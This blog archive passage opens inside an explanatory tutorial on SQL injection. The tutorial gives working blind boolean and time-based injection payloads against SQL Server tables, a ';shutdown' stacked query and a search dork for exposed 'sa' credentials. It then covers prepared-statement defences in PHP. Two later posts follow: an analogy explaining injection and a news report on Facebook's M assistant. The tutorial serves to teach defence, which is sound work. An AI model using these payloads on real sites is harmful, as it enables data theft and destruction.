</span><span style="color: blue;">select top </span>1 <span style="color: magenta;">substring</span><span style="color: grey;">(</span><span style="color: teal;">name</span><span style="color: grey;">, </span>1<span style="color: grey;">, </span>1<span style="color: grey;">) </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: grey;">(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u' </span><span style="color: blue;">order by </span><span style="color: teal;">id
</span><span style="color: grey;">) </span><span style="color: teal;">sq </span><span style="color: blue;">order by </span><span style="color: teal;">id </span><span style="color: blue;">desc
</span><span style="color: grey;">)
) = </span><span style="color: red;">'a'
</span></pre>
Keeping in mind that this entire block replaces <i>just the query string value</i>
so instead of “?id=1” it becomes “?id=1 and…”, it’s actually only a
minor variation on the earlier requests intended to retrieve table
names. In fact the main different is that rather than attempting to
cause an exception by converting a string to an integer, it’s now an
equivalency test to see if the first character of the table name is an
“a” (we’re assuming a case-insensitive collation here). If this request
gives us the same result as “?id=1” then it confirms that the first
table in sysobjects does indeed begin with an “a” as the equivalency has
held true. If it gives us one of the earlier mentioned two scenarios
(an error or shows no record), then we know that the table <i>doesn’t</i> begin with an “a” as no record has been returned.<br />
Now all of that only gives us the first character of the table name
from sysobjects, when you want the second character then the substring
statement needs to progress to the next position:<br />
<pre class="code"><span style="color: blue;">select top </span>1 <span style="color: magenta;">substring</span><span style="color: grey;">(</span><span style="color: teal;">name</span><span style="color: grey;">, </span>2<span style="color: grey;">, </span>1<span style="color: grey;">) </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span></pre>
You can see it now starts at position 2 rather than position 1. Of
course this is laborious; as well as enumerating through all the tables
in sysobjects you end up enumerating through all the possible letters of
the alphabet until you get a hit then you have to repeat the process
for each character of the table name. There is, however, a little
shortcut that looks like this:<br />
<pre class="code">1 <span style="color: grey;">and
(
</span><span style="color: blue;">select top </span>1 <span style="color: magenta;">ascii</span><span style="color: grey;">(</span><span style="color: magenta;">lower</span><span style="color: grey;">(</span><span style="color: magenta;">substring</span><span style="color: grey;">(</span><span style="color: teal;">name</span><span style="color: grey;">, </span>1<span style="color: grey;">, </span>1<span style="color: grey;">))) </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: grey;">(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u' </span><span style="color: blue;">order by </span><span style="color: teal;">id
</span><span style="color: grey;">) </span><span style="color: teal;">sq </span><span style="color: blue;">order by </span><span style="color: teal;">id </span><span style="color: blue;">desc
</span><span style="color: grey;">)
) > </span>109
</pre>
There’s a subtle but important difference here in that what’s it
doing is rather than checking for an individual character match, it’s
looking for where that character falls in the ASCII table. Actually,
it’s first lowercasing the table name to ensure we’re only dealing with
26 characters (assuming alpha-only naming, of course), then it’s taking
the ASCII value of that character. In the example above, it then checks
to see if the character is further down the table than the letter “m”
(ASCII 109) and then of course the same potential outcomes as described
earlier apply (either a record comes back or it doesn’t). The main
difference is that rather than potentially making 26 attempts at
guessing the character (and consequently making 26 HTTP requests), it’s
now going to exhaust all possibilities in only 5 – you just keep halving
the possible ASCII character range until there’s only one possibility
remaining.<br />
For example, if greater than 109 then it must be between “n” and “z”
so you split that (roughly) in half and go greater than 115. If that’s
false then it must be between “n” and “s” so you split that bang in half
and go greater than 112. That’s true so there’s only three chars left
which you can narrow down to one in a max of two guesses. Bottom line is
that the max of 26 guesses (call it average of 13) is now done in only 5
as you simply just keep halving the result set.<br />
By constructing the right requests the app will still tell you
everything it previously did in that very explicit, rich error message
way, it’s just that it’s now being a little coy and you have to coax the
answers out of it. This is frequently referred to as “Boolean-based”
SQL injection and it works well where the previously demonstrated
“Union-based” and “Error-based” approaches won’t fly. But it’s also not
fool proof; let’s take a look at one more approach and this time we’re
going to need to be a little more patient.<br />
<h4>
Disclosure through patience: Time-based blind injection</h4>
Everything to date has worked on the presumption that the app will
disclose information via the HTML output. In the earlier examples the
union-based and error-based approaches gave us data in the browser that
explicitly told us object names and disclosed internal data. In the
blind boolean-based examples we were <i>implicitly</i> told the same
information by virtue of the HTML response being different based on a
true versus a false equivalency test. But what happens when this
information can’t be leaked via the HTML either explicitly or
implicitly?<br />
Let’s imagine another attack vector using this URL:<br />
<u><span style="color: blue;">http://widgetshop.com/Widgets/?OrderBy=Name</span></u><br />
In this case it’s pretty fair to assume that the query will translate through to something like this:<br />
<pre class="code"><span style="color: blue;">SELECT </span><span style="color: grey;">* </span><span style="color: blue;">FROM </span><span style="color: teal;">Widget </span><span style="color: blue;">ORDER BY </span><span style="color: teal;">Name
</span></pre>
Clearly we can’t just starting adding conditions directly into the
ORDER BY clause (although there are other angles from which you could
mount a boolean-based attack), so we need to try another approach. A
common technique with SQLi is to terminate a statement and then append a
subsequent one, for example like this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widgets/?OrderBy=Name;SELECT DB_NAME()</span></u><br />
That’s a pretty innocuous one (although certainly discovering the
database name can be useful), a more destructive approach would be to do
something like “DROP TABLE Widget”. Of course the account the web app
is connecting to the database with needs the rights to be able to do
this, the point is that once you can start chaining together queries
then the potential really starts to open up.<br />
Getting back to blind SQLi though, what we need to do now is find
another way to do the earlier boolean-based tests using a subsequent
statement and the way we can do that is to introduce is a delay using
the WAITFOR DELAY syntax. Try this on for size:<br />
<pre class="code"><span style="color: teal;">Name</span><span style="color: grey;">;
</span><span style="color: blue;">IF</span><span style="color: grey;">(EXISTS(
</span><span style="color: blue;">select top </span>1 <span style="color: grey;">* </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">id</span><span style="color: grey;">=(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: grey;">(
</span><span style="color: blue;">select top </span>1 <span style="color: teal;">id </span><span style="color: blue;">from </span><span style="color: green;">sysobjects </span><span style="color: blue;">where </span><span style="color: teal;">xtype</span><span style="color: grey;">=</span><span style="color: red;">'u' </span><span style="color: blue;">order by </span><span style="color: teal;">id
</span><span style="color: grey;">) </span><span style="color: teal;">sq </span><span style="color: blue;">order by </span><span style="color: teal;">id </span><span style="color: blue;">desc
</span><span style="color: grey;">) and </span><span style="color: magenta;">ascii</span><span style="color: grey;">(</span><span style="color: magenta;">lower</span><span style="color: grey;">(</span><span style="color: magenta;">substring</span><span style="color: grey;">(</span><span style="color: teal;">name</span><span style="color: grey;">, </span>1<span style="color: grey;">, </span>1<span style="color: grey;">))) > </span>109
<span style="color: grey;">))
</span><span style="color: blue;">WAITFOR DELAY </span><span style="color: red;">'0:0:5'
</span></pre>
This is only really a slight variation of the earlier examples in
that rather than changing the number of records returned by manipulating
the WHERE clause, it’s now just a totally new statement that looks for
the presence of a table at the end of sysobjects beginning with a letter
greater than “m” and if it exists, the query then takes a little nap
for 5 seconds. We’d still need to narrow down the ASCII character range
and we’d still need to move through each character of the table name <i>and</i>
we’d still need to look at other tables in sysobjects (plus of course
then look at syscolumns and then actually pull data out), but all of
that is entirely possible with a bit of time. 5 seconds may be longer
than needed or it may not be long enough, it all comes down to how
consistent the response times from the app are because ultimately this
is all designed to manipulate the observable behaviour which is how long
it takes between making a request and receiving a response.<br />
This attack – as with all the previous ones – could, of course, be
entirely automated as it’s nothing more than simple enumerations and
conditional logic. Of course it could end up taking a while but that’s a
relative term; if a normal request takes 1 second and half of the 5
attempts required to find the right character return true then you’re
looking at 17.5 seconds per character, say 10 chars in an average table
name is about 3 minutes a table then maybe 20 tables in a DB so call it
one hour and you’ve discovered every table name in the system. And
that’s if you’re doing all this in a single-threaded fashion.<br />
<h4>
It doesn’t end there…</h4>
This is one of those topics with a heap of different angles, not
least of which is because there are so many different combinations of
database, app framework and web server not to mention a whole gamut of
defences such as web application firewalls. An example of where things
can get tricky is if you need to resort to a time-based attack yet the
database doesn’t support a delay feature, for example an Access database
(yes, some people actually do put these behind websites!) One approach
here is to use what’s referred to as <a href="http://technet.microsoft.com/en-us/library/cc512676.aspx">heavy queries</a> or in other words, queries which by their very nature will cause a response to be slow.<br />
The other thing worth mentioning about SQLi is that two really
significant factors play a role in the success an attacker has
exploiting the risk: The first is input sanitisation in terms of what
characters the app will actually accept and pass through to the
database. Often we’ll see very piecemeal approaches where, for example,
angle brackets and quotes are stripped but everything else is allowed.
When this starts happening the attacker needs to get creative in terms
of how they structure the query so that these roadblocks are avoided.
And that’s kind of the second point – the attacker’s SQL prowess is
vitally important. This goes well beyond just your average TSQL skills
of SELECT FROM, the proficient SQL injector understands numerous tricks
to both bypass the input sanitisation and select data from the system in
such a way that it can be retrieved via the web UI. For example, little
tricks like discovering a column type by using a query such as this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widget/?id=1 union select sum(instock) from widget</span></u><br />
In this case, error-based injection will give tell you exactly what
type the “InStock” column is when the error bubbles up to the UI (and no
error will mean it’s numeric):<br />
<img alt="Operand data type bit is invalid for sum operator." border="0" src="http://lh6.ggpht.com/-c9drKzJTJyA/Ufd7LQfJsdI/AAAAAAAAFj0/QWXqQVSNtxw/image3.png?imgmax=800" height="112" style="background-image: none; border-bottom: 0px; border-left: 0px; border-right: 0px; border-top: 0px; display: inline; padding-left: 0px; padding-right: 0px; padding-top: 0px;" title="" width="500" /><br />
Or once you’re totally fed up with the very presence of that damned
vulnerable site still being up there on the web, a bit of this:<br />
<u><span style="color: blue;">http://widgetshop.com/Widget/?id=1;shutdown</span></u><br />
But injection goes a lot further than just pulling data out via HTTP, for example there are <a href="https://www.pentesterlab.com/from_sqli_to_shell/from_sqli_to_shell.pdf">vectors that will grant the attacker shell on the machine</a>.
Or take another tangent – why bother trying to suck stuff out through
HTML when you might be able to just create a local SQL user and remotely
connect using SQL Server Management Studio over port 1433? But hang on –
you’d need the account the web app is connecting under to have the
privileges to actually create users in the database, right? Yep, and
plenty of them do, in fact you can find some of these <a href="https://www.google.com.au/search?num=100&safe=off&q=filetype%3Aconfig+inurl%3Aweb.config+inurl%3Aftp+%22user+id%3Dsa%22&oq=filetype%3Aconfig+inurl%3Aweb.config+inurl%3Aftp+%22user+id%3Dsa%22">just by searching Google</a> (of course there is no need for SQLi in these cases, assuming the SQL servers are publicly accessible).<br />
Lastly, if there’s any remaining doubt as to both the prevalence and
impact of SQLi flaws in today’s software, just last week there was <a href="http://www.computerworld.com/s/article/9241084/SQL_flaws_remain_an_Achilles_heel_for_IT_security_groups">news of what is arguably one of the largest hacking schemes to date</a> which (allegedly) resulted in losses of $300 million:<br />
<blockquote>
The indictment also suggest that the hackers, in most cases, did not
employ particularly sophisticated methods to gain initial entry into the
corporate networks. The papers show that in most cases, the breach was
made via SQL injection flaws -- a threat that has been thoroughly
documented and understood for well over than a decade.</blockquote>
Perhaps SQLi is not quite as well understood as some people think.<br />
<br />
If you think about fixing it through php this following would work :<br />
<br />
<b>SqlInjection prevention In Php </b><br />
<br />
<div class="post-text" itemprop="text">
<b>Use prepared statements and parameterized queries.</b>
These are SQL statements that are sent to and parsed by the database
server separately from any parameters. This way it is impossible for an
attacker to inject malicious SQL.<br />
You basically have two options to achieve this:<br />
<ol>
<li>Using <a href="http://php.net/manual/en/book.pdo.php">PDO</a> (for any supported database driver):<br />
<pre class="lang-php prettyprint prettyprinted"><code><span class="pln">$stmt </span><span class="pun">=</span><span class="pln"> $pdo</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="str">'SELECT * FROM employees WHERE name = :name'</span><span class="pun">);</span><span class="pln">
$stmt</span><span class="pun">-></span><span class="pln">execute</span><span class="pun">(</span><span class="pln">array</span><span class="pun">(</span><span class="str">'name'</span><span class="pln"> </span><span class="pun">=></span><span class="pln"> $name</span><span class="pun">));</span><span class="pln">
</span><span class="kwd">foreach</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$stmt </span><span class="kwd">as</span><span class="pln"> $row</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln">
</span><span class="com">// do something with $row</span><span class="pln">
</span><span class="pun">}</span></code></pre>
</li>
<li>Using <a href="http://php.net/manual/en/book.mysqli.php">MySQLi</a> (for MySQL):<br />
<pre class="lang-php prettyprint prettyprinted"><code><span class="pln">$stmt </span><span class="pun">=</span><span class="pln"> $dbConnection</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="str">'SELECT * FROM employees WHERE name = ?'</span><span class="pun">);</span><span class="pln">
$stmt</span><span class="pun">-></span><span class="pln">bind_param</span><span class="pun">(</span><span class="str">'s'</span><span class="pun">,</span><span class="pln"> $name</span><span class="pun">);</span><span class="pln">
$stmt</span><span class="pun">-></span><span class="pln">execute</span><span class="pun">();</span><span class="pln">
$result </span><span class="pun">=</span><span class="pln"> $stmt</span><span class="pun">-></span><span class="pln">get_result</span><span class="pun">();</span><span class="pln">
</span><span class="kwd">while</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$row </span><span class="pun">=</span><span class="pln"> $result</span><span class="pun">-></span><span class="pln">fetch_assoc</span><span class="pun">())</span><span class="pln"> </span><span class="pun">{</span><span class="pln">
</span><span class="com">// do something with $row</span><span class="pln">
</span><span class="pun">}</span></code></pre>
</li>
</ol>
If you're connecting to a database other than MySQL, there is a driver-specific second option that you can refer to (e.g. <code>pg_prepare()</code> and <code>pg_execute()</code> for PostgreSQL). PDO is the universal option.<br />
<h2>
Correctly setting up the connection</h2>
Note that when using <code>PDO</code> to access a MySQL database <i>real</i> prepared statements are <b>not used by default</b>. To fix this you have to disable the emulation of prepared statements. An example of creating a connection using PDO is:<br />
<pre class="lang-php prettyprint prettyprinted"><code><span class="pln">$dbConnection </span><span class="pun">=</span><span class="pln"> </span><span class="kwd">new</span><span class="pln"> PDO</span><span class="pun">(</span><span class="str">'mysql:dbname=dbtest;host=127.0.0.1;charset=utf8'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'user'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'pass'</span><span class="pun">);</span><span class="pln">
$dbConnection</span><span class="pun">-></span><span class="pln">setAttribute</span><span class="pun">(</span><span class="pln">PDO</span><span class="pun">::</span><span class="pln">ATTR_EMULATE_PREPARES</span><span class="pun">,</span><span class="pln"> </span><span class="kwd">false</span><span class="pun">);</span><span class="pln">
$dbConnection</span><span class="pun">-></span><span class="pln">setAttribute</span><span class="pun">(</span><span class="pln">PDO</span><span class="pun">::</span><span class="pln">ATTR_ERRMODE</span><span class="pun">,</span><span class="pln"> PDO</span><span class="pun">::</span><span class="pln">ERRMODE_EXCEPTION</span><span class="pun">);</span></code></pre>
In the above example the error mode isn't strictly necessary, <b>but it is advised to add it</b>. This way the script will not stop with a <code>Fatal Error</code> when something goes wrong. And it gives the developer the chance to <code>catch</code> any error(s) which are <code>throw</code>n as <code>PDOException</code>s.<br />
What is <b>mandatory</b> however is the first <code>setAttribute()</code> line, which tells PDO to disable emulated prepared statements and use <i>real</i>
prepared statements. This makes sure the statement and the values
aren't parsed by PHP before sending it to the MySQL server (giving a
possible attacker no chance to inject malicious SQL).<br />
Although you can set the <code>charset</code> in the options of the constructor, it's important to note that 'older' versions of PHP (< 5.3.6) <a href="http://php.net/manual/en/ref.pdo-mysql.connection.php">silently ignored the charset parameter</a> in the DSN.<br />
<h2>
Explanation</h2>
What happens is that the SQL statement you pass to <code>prepare</code> is parsed and compiled by the database server. By specifying parameters (either a <code>?</code> or a named parameter like <code>:name</code> in the example above) you tell the database engine where you want to filter on. Then when you call <code>execute</code>, the prepared statement is combined with the parameter values you specify. <br />
The important thing here is that the parameter values are combined
with the compiled statement, not an SQL string. SQL injection works by
tricking the script into including malicious strings when it creates SQL
to send to the database. So by sending the actual SQL separately from
the parameters, you limit the risk of ending up with something you
didn't intend. Any parameters you send when using a prepared statement
will just be treated as strings (although the database engine may do
some optimization so parameters may end up as numbers too, of course).
In the example above, if the <code>$name</code> variable contains <code>'Sarah'; DELETE FROM employees</code> the result would simply be a search for the string <code>"'Sarah'; DELETE FROM employees"</code>, and you will not end up with <a href="http://xkcd.com/327/">an empty table</a>.<br />
Another benefit with using prepared statements is that if you execute
the same statement many times in the same session it will only be
parsed and compiled once, giving you some speed gains.<br />
Oh, and since you asked about how to do it for an insert, here's an example (using PDO):<br />
<pre class="lang-php prettyprint prettyprinted"><code><span class="pln">$preparedStatement </span><span class="pun">=</span><span class="pln"> $db</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="str">'INSERT INTO table (column) VALUES (:column)'</span><span class="pun">);</span><span class="pln">
$preparedStatement</span><span class="pun">-></span><span class="pln">execute</span><span class="pun">(</span><span class="pln">array</span><span class="pun">(</span><span class="str">'column'</span><span class="pln"> </span><span class="pun">=></span><span class="pln"> $unsafeValue</span><span class="pun">));</span></code></pre>
<h2>
Can Prepared Statements Be Used For Dynamic Queries?</h2>
While you can still use prepared statements for the query parameters,
the structure of the dynamic query itself cannot be parametrized and
certain query features (e.g. <code>LIMIT $start, $number</code>) cannot be parametrized.<br />
For example, this will <b>not work</b>:<br />
<pre class="default prettyprint prettyprinted"><code><span class="pln">$stmt </span><span class="pun">=</span><span class="pln"> $pdo</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="str">'SELECT * FROM employees ORDER BY name ASC LIMIT ?, ?'</span><span class="pun">);</span><span class="pln"> </span><span class="com">// Bad query</span><span class="pln">
$stmt</span><span class="pun">-></span><span class="pln">execute</span><span class="pun">(</span><span class="pln">array</span><span class="pun">(</span><span class="lit">0</span><span class="pun">,</span><span class="pln"> </span><span class="lit">30</span><span class="pun">));</span></code></pre>
For these specific scenarios, the best thing to do is use a whitelist
filter that restricts the possible values or the possible characters.<br />
<pre class="default prettyprint prettyprinted"><code><span class="com">// Value whitelist</span><span class="pln">
</span><span class="com">// $dir can only be 'DESC' or 'ASC'</span><span class="pln">
$dir </span><span class="pun">=</span><span class="pln"> </span><span class="pun">!</span><span class="pln">empty</span><span class="pun">(</span><span class="pln">$direction</span><span class="pun">)</span><span class="pln"> </span><span class="pun">?</span><span class="pln"> </span><span class="str">'DESC'</span><span class="pln"> </span><span class="pun">:</span><span class="pln"> </span><span class="str">'ASC'</span><span class="pun">;</span><span class="pln">
</span><span class="com">// Character set whitelist</span><span class="pln">
</span><span class="com">// $offset will never contain a non-numeric character</span><span class="pln">
$offset </span><span class="pun">=</span><span class="pln"> preg_replace</span><span class="pun">(</span><span class="str">'/[^0-9]+/'</span><span class="pun">,</span><span class="pln"> </span><span class="str">''</span><span class="pun">,</span><span class="pln"> $offset</span><span class="pun">);</span><span class="pln">
</span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">empty</span><span class="pun">(</span><span class="pln">$offset</span><span class="pun">))</span><span class="pln"> </span><span class="pun">{</span><span class="pln">
$offset </span><span class="pun">=</span><span class="pln"> </span><span class="lit">0</span><span class="pun">;</span><span class="pln">
</span><span class="pun">}</span><span class="pln">
</span><span class="com">// Explicit data types</span><span class="pln">
</span><span class="com">// $number will always be an integer. We use a binary AND operation</span><span class="pln">
</span><span class="com">// ($number & PHP_INT_MAX) to prevent integer overflows from creating</span><span class="pln">
</span><span class="com">// invalid characters from alternative notation.</span><span class="pln">
$number </span><span class="pun">=</span><span class="pln"> </span><span class="pun">(</span><span class="kwd">int</span><span class="pun">)</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$number </span><span class="pun"><</span><span class="pln"> </span><span class="lit">0</span><span class="pln"> </span><span class="pun">?</span><span class="pln"> </span><span class="lit">1</span><span class="pln"> </span><span class="pun">:</span><span class="pln"> </span><span class="pun">(</span><span class="pln">$number </span><span class="pun">&</span><span class="pln"> PHP_INT_MAX</span><span class="pun">));</span><span class="pln">
$stmt </span><span class="pun">=</span><span class="pln"> $pdo</span><span class="pun">-></span><span class="pln">prepare</span><span class="pun">(</span><span class="pln">
</span><span class="str">'SELECT * FROM employees ORDER BY name '</span><span class="pun">.</span><span class="pln">$dir</span><span class="pun">.</span><span class="str">' LIMIT '</span><span class="pun">.</span><span class="pln">$offset</span><span class="pun">.</span><span class="str">', '</span><span class="pun">.</span><span class="pln">$number
</span><span class="pun">);</span></code></pre>
</div>
<br />
<br />
<b>Hope it helps..</b><br />
<br />
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com19tag:blogger.com,1999:blog-4509349481580895365.post-31132873601080691992015-08-28T11:47:00.001+05:302015-08-28T11:47:28.471+05:30What is sql injection ?<div dir="ltr" style="text-align: left;" trbidi="on">
Hi friends<br />
<br />
today i am going to share the intresting article found at dmz,what is sql injection and how its going to be exploited.<br />
<br />
Technically speaking :<br />
<br />
<span class="_Tgc"><b>SQL injection</b> is a code <b>injection</b> technique, used to attack data-driven applications, in which malicious <b>SQL</b> statements are inserted into an entry field for execution (e.g. to dump the database contents to the attacker).</span><br />
<br />
<span class="_Tgc">Now what about layman whom doesnt understand anything about sql injection</span><br />
<br />
<span class="_Tgc">Polynomial of dmz breifed it quiet right :</span><br />
<br />
<div class="post-text" itemprop="text">
The way I demonstrate it to complete non-techies is with a simple analogy.<br />
Imagine you're a robot in a warehouse full of boxes. Your job is to
fetch a box from somewhere in the warehouse, and put it on the conveyor
belt. Robots need to be told what to do, so your programmer has given
you a set of instructions on a paper form, which people can fill out and
hand to you.<br />
The form looks like this:<br />
<blockquote>
Fetch item number ____ from section ____ of rack number ____, and place it on the conveyor belt.<br />
</blockquote>
A normal request might look like this:<br />
<blockquote>
Fetch item number <strong>1234</strong> from section <strong>B2</strong> of rack number <strong>12</strong>, and place it on the conveyor belt.<br />
</blockquote>
The values in bold (1234, B2, and 12) were provided by the person
issuing the request. You're a robot, so you do what you're told: you
drive up to rack 12, go down it until you reach section B2, and grab
item 1234. You then drive back to the conveyor belt and drop the item
onto it.<br />
But what if a user put something other than normal values into the form? What if the user added instructions into them?<br />
<blockquote>
Fetch item number <strong>1234</strong> from section <strong>B2</strong> of rack number <strong>12, and throw it out the window. Then go back to your desk and ignore the rest of this form.</strong> and place it on the conveyor belt.<br />
</blockquote>
Again, the parts in bold were provided by the person issuing the
request. Since you're a robot, you do exactly what the user just told
you to do. You drive over to rack 12, grab item 1234 from section B2,
and throw it out of the window. Since the instructions also tell you to
ignore the last part of the message, the "and place it on the conveyor
belt" bit is ignored.<br />
This technique is called "injection", and it's possible due to the
way that the instructions are handled - the robot can't tell the
difference between <em>instructions</em> and <em>data</em>, i.e. the actions it has to perform, and the things it has to do those actions on.<br />
SQL is a special language used to tell a database what to do, in a
similar way to how we told the robot what to do. In SQL injection, we
run into exactly the same problem - a query (a set of instructions)
might have parameters (data) inserted into it that end up being
interpreted as instructions, causing it to malfunction. A malicious user
might exploit this by telling the database to return every user's
details, which is obviously not good!<br />
In order to avoid this problem, we must separate the instructions and
data in a way that the database (or robot) can easily distinguish. This
is usually done by sending them separately. So, in the case of the
robot, it would read the blank form containing the instructions,
identify where the parameters (i.e. the blank spaces) are, and store it.
A user can then walk up and say "1234, B2, 12" and the robot will apply
those values to the instructions, without allowing them to be
interpreted as instructions themselves. In SQL, this technique is known
as parameterised queries.<br />
In the case of the "evil" parameter we gave to the robot, he would now raise a mechanical eyebrow quizzically and say<br />
<blockquote>
Error: Cannot find rack number "<strong>12, and throw it out the window. Then go back to your desk and ignore the rest of this form.</strong>" - are you sure this is a valid input?<br />
</blockquote>
Success! We've stopped the robot's "glitch".<br />
<br />
Another explnation would be :<br />
<br />
You are about to go to the bank to perform a transaction on behalf of
your boss. Your boss gave you an envelope with instructions for the
cashier.<br />
The instructions read:<br />
<pre><code>Write the balance for account with number 8772344 on this paper.
Signed,
Boss
</code></pre>
You leave the envelope out of your sight for a few minutes while you
go to the bathroom. A thief opens the envelope and adds above the
signature: "Also transfer $500 from account 8772344 to another account
with number 12747583.".<br />
Now the full message reads:<br />
<pre><code>Write the balance for account with number 8772344 on this paper.
Also transfer $500 from account 8772344 to another account with number 12747583.
Signed,
Boss
</code></pre>
The cashier checks your identification and verifies that you are an
authorized person for the account in question and follows the
instructions in the letter.<br />
Your boss is the legitimate program code.
You are the program code and database driver that is delivering the SQL code to the database.
The letter is the SQL code that is being passed to the database.
The thief is the attacker.
The cashier is the database.
The identification is typically a login and password to the database.<br />
<br />
which clarifies basics of sql injection,hoping for your comments<br />
<br />
<br />
<br />
</div>
</div>
BlackBarbie-bbhttp://www.blogger.com/profile/03407685720956138113noreply@blogger.com3tag:blogger.com,1999:blog-4509349481580895365.post-36367353638404257222015-08-27T19:53:00.001+05:302015-08-27T19:53:56.268+05:30 Facebook’s virtual assistant "M"<div dir="ltr" style="text-align: left;" trbidi="on">
Facebook is the latest technology company to offer users a virtual assistant service.<br />
Facebook is testing the artificial intelligence-powered service,
called simply "M," inside its messaging app, Messenger, with some users.<br />
David Marcus, the head of messaging products at the Menlo Park,
California company, says in a Facebook post that M can do things like
buy items for you, get gifts delivered and book restaurant reservations
or appointments.<br />
Apple's Siri is the most well-known virtual assistant. Microsoft and Amazon also have options.<br />
Marcus says M aims to do more than other digital assistants on the market by completing tasks on the user's behalf.<br />
With more than 700 million users, Messenger is one of the world's most popular messaging apps.<br />
<br />
<a class=" u-underline" data-component="auto-linked-tag" data-link-name="auto-linked-tag" href="http://www.theguardian.com/technology/facebook">Facebook</a>
is launching a virtual assistant that combines artificial intelligence
(AI) technology with a team of human helpers, to compete with services
such as Apple’s Siri, Google Now and Microsoft’s Cortana.<br />
Facebook M will sit within the social network’s Facebook Messenger
app, with people interacting with it using messages as if it were one of
their friends.<br />
“M is a personal digital assistant inside of Messenger that completes
tasks and finds information on your behalf. It’s powered by artificial
intelligence that’s trained and supervised by people,” explained
Facebook’s messaging boss David Marcus, <a class=" u-underline" data-component="in-body-link" data-link-name="in body link" href="https://www.facebook.com/Davemarcus/posts/10156070660595195">in a post on the social network</a>.<br />
“Unlike other AI-based services in the market, M can actually
complete tasks on your behalf. It can purchase items, get gifts
delivered to your loved ones, book restaurants, travel arrangements,
appointments and way more.”<br />
Facebook M is currently in tests internally and with a few Facebook
users, with no confirmed launch date to roll it out to the 700 million
users of Messenger.<br />
Screenshots published by Marcus show sample queries including “Can
you help me order flowers for my mom’s birthday?”; “Where’s the best
place to go hiking in the Bay Area?”; and “Is there a dog-friendly beach
nearby?”<br />
<br />
<br />
<div class="u-responsive-ratio" style="padding-bottom: 72.42%;">
</div>
<div class="u-responsive-ratio" style="padding-bottom: 72.42%;">
</div>
<div class="u-responsive-ratio" style="padding-bottom: 72.42%;">
<img alt="Example queries from Facebook M." class="gu-image" itemprop="contentUrl" src="https://i.guim.co.uk/img/static/sys-images/Guardian/Pix/pictures/2015/8/27/1440662738568/70844cee-3fb6-4413-bfe2-cdc0f8cdf240-620x449.jpeg?w=300&q=85&auto=format&sharp=10&s=1ca6f2890339baa63b408862d9cab000" /> <br />Facebook M is part of a bigger, ambitious strategy for Messenger to become more than just an app for chatting to friends.<br />
It won’t take long for Messenger’s users to realize M can accomplish
much more than your standard digital helper, suspects David Marcus, vice
president of messaging products at Facebook. “It can perform tasks that
none of the others can,” Marcus says. That’s because, in addition to
using artificial intelligence to complete its tasks, M is powered by
actual people.<br />
Companies from Google to Taskrabbit are engineering products to act
as superpowered personal assistants. Some, like Apple’s Siri, Google
Now, or Microsoft’s Cortana, rely entirely on technology, and though
they can be used by a lot of people, their range of tasks remains
limited. Others, like startups Magic and Operator or gig-economy
companies like TaskRabbit, employ people to respond to text-based
requests. These services can get nearly anything done—for a much smaller
number of folks. M is a hybrid. It’s a virtual assistant powered by
artificial intelligence as well as a band of Facebook employees, dubbed M
trainers, who will make sure that every request is answered.<br />
Facebook’s goal is to make Messenger the first stop for mobile
discovery. Google has long had search locked up on the desktop: Right
now, if I’m looking to treat my summer cold, and I’m in front of my
laptop, I begin by googling “cold meds Upper West Side.” On mobile,
however, I may pull up any number of apps–Google, Google Maps,
Twitter–to find that out, or I may just ask Siri. Facebook starts at a
disadvantage on mobile because it doesn’t have its own operating system,
and therefore users must download an app, and then open it. Marcus
hopes to make up for that by creating a virtual assistant so powerful,
it’s the first stop for anyone looking to do or buy anything.<br />
“We start capturing all of your intent for the things you want to
do,” says Marcus. “Intent often leads to buying something, or to a
transaction, and that’s an opportunity for us to [make money] over
time.”<br />
If M can provide a more efficient service than its competitors,
Facebook can boost the number of people using it on mobile, and
eventually spur revenue from their transactions. That’s the kind of
win-win Marcus was brought in to accomplish at Facebook, which in June
2014 hired him away from PayPal, where he had been CEO. In less than two
years, Facebook has more than tripled Messenger’s users to 700 million.<br />
<h3>
How It Works</h3>
To try the new service, users will tap a small button at the bottom
of the Messenger app to send a note to M, the same way they might
message anyone on Facebook. M’s software will decode the natural
language, ask followup questions in the message thread, and send updates
as the task is completed. Users won’t necessarily know whether a
computer or a person has helped them; unlike Siri and Cortana, M has no
gender.<br />
